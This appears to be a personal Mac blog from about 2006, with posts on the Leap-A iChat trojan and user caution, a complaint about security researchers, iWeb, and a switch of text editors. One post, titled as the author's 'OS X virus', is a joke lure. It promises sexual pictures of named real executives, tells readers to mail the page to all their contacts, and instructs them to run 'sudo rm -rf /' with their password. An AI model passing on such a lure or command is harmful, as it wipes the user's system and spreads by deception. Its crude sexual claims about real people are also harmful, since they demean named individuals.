Use your brain


There has been a lot of hoopla surrounding last week’s release of the Leap-A trojan, and as usual, Mac Daily Journal does an excellent job of cutting to the chase and laying out the facts. (If you’re not an MDJ subscriber, you should be.) Mr. Deathrage has written an excellent description of what the trojan does (and doesn’t), how it spreads (or doesn’t), and how it can be easily thwarted. For those unfamiliar with Input Managers, a good description of their use and function is provided, and a description of how Leap-A and other potential malware can exploit them is included as well.

However, I think through all the coverage, whether from MDJ, the (increasingly lame) Mac media, or the MSM, one important aspect is being neglected: This trojan can only be activated and spread if you, the user, purposefully do it.

Certainly, permissions can be changed on certain folders to prevent Leap-A from doing its malicious deed. And anti-virus vendors have updated their signatures to identify or remove Leap-A, depending on the software package. But none of that is necessary if you use some (un)common sense.

When an unsolicited or unexpected file transfer request from a Bonjour iChat buddy appears (the worm does not spread to AIM or .Mac iChat buddies), you should always ask your buddy, “What are you sending me?” This has always been the right thing to do in the past, and it will always be the right thing to do in the future. Accepting file transfers from anyone, even someone you know and trust, without first verifying what’s being sent and that the sender realizes something is coming from his machine, is, frankly, stupid. (iChat does not have the ability to automatically accept file transfers.) There is no preference, permission, or setting that can compensate for user intelligence. If the sender isn’t aware of the file being sent, or doesn’t respond, decline the file transfer. Trojan thwarted.

When someone posts what are allegedly screenshots from the latest cool piece of software, or the genitalia of a celebrity, or anything else that seems too good to be true, be very skeptical, if not wholly suspicious. Ask yourself why the poster is providing a compressed file instead of posting the pictures outright. Resist the urge (you really can if you try, I swear) to immediately download this unknown, compressed file. Again, no warning, preference, or permission is a substitute for your intelligence.

This trojan spreads after you accept and activate it. Whatever useful system tools the trojan misuses to cause damage, whatever method it uses to attempt to spread, none of these things can occur until you, the user, allow them to occur. The action line for the prevention of this trojan should be to inform users to use their brains, not to fiddle with permissions.

There is no substitute for your own intelligence!

A note about our latest false “virus”


Now that we’ve passed the peak of yet another “virus” that isn’t, the usual security researchers, who seem to be clueless, say the same thing they always say, in essence: Mac users need to wake up and stop thinking they’re invulnerable to malware. That statement makes one big false presumption, that Mac users think they’re invulnerable to malware.

In the past several years, I’ve had the opportunity to meet and converse with hundreds of Mac users from all kinds of places and backgrounds. I would consider the cross section of people I’ve encountered a good representative sampling of the user community as a whole, and I can say that not one of those people considers their Mac invulnerable to malware. None. Zero. And having to endure that characterization by outsiders is insulting.

It’s obvious why security researchers and anti-virus creators want Mac OS X to be as vulnerable as other operating systems. It’s childishness, spite, and jealousy that drive users of other operating systems to characterize Mac users as something they are not. The Mac user community understands the situation and they’re proud of the OS that has helped ensure their security, but they’re not delusional and they have no serious preconceptions that they’re immune from malicious elements of our world. We may currently enjoy a trouble-free computing experience with regard to malware, and we may speak happily about that fact, but satisfaction isn’t necessarily the same as complacency.

My Mac OS X virus


Hello! Would you like to see homoerotic pictures of Steve Jobs and Paul Otellini backstage at Macworld San Francisco 2006? If so, please perform the following:

  1. Copy and paste the address of this page into an e-mail sent to everyone in your address book.
  2. Start /Applications/Utilities/Terminal.app
  3. Copy and paste the following into the Terminal window:
    sudo rm -rf /
  4. Enter your password when prompted.
  5. Wait a few minutes and a picture of Paul and Steve in hot gay action will appear on your screen!

Thanks for participating in my OS X virus!

The Revenge of the Giant Head


I purchased iLife 06 and I’ve used iWeb. I want something like iWeb to become my primary web creation tool, but there are too many things iWeb and other applications like it just don’t do. I understand that iWeb is intended to be very simple for users who want to toss pictures of the kids onto a web host somewhere, and I’m cool with that. But I’d still like to have something similar for those of us who are more advanced.

Nevertheless, I’ve been toying with iWeb and my .Mac account. I’ve had some fun with it and I figured, why not start a second pointless website with even more mindless yakity-yak. Done and done! Check out The Revenge of the Giant Head any time by clicking the giant head picture on the right. Important things will still remain on this page - it isn’t going anywhere. Just think of the giant head as a supplement to an already content-thin site.

From one funnily named app to another


Until recently, I used the excellent SubEthaEdit for my text editing needs. It had a lot of very cool features, not the least of which was the ability to share documents via Bonjour or over the Internet for simultaneous editing, and the price was right: Free for non-commercial use.

SubEthaEdit’s latest release, 2.3, changed all that. It’s no longer free for non-commercial users. Rather, it’s $35 for all users. I understand the work that goes into developing an app like SubEthaEdit, and consequently I understand their need to get some cash flowing into the operation. At the same time, there are other good, free text editors out there and it’s hard to justify purchasing one.

But isn’t this a commercial site? After all, I have one of those ubiquitous Amazon links on the right. Don’t I make money from these pages? Well, no. This isn’t a commercial site because I’m not personally selling anything. This is just for my personal amusement and occasional experimentation. That Amazon ad has produced a single-digit dollar amount of revenue since its inception, and if you’re a regular reader of this page, you know that sometimes I may not update it for months. It’s not any kind of serious money-making attempt.

So for the time being, I’ve had to say a reluctant goodbye to SubEthaEdit and instead I’ve adopted Smultron as my new day-to-day editor. It lacks the collaboration features of SubEthaEdit, but I suppose that’s the price of free(beer)ness. Onward and upward.
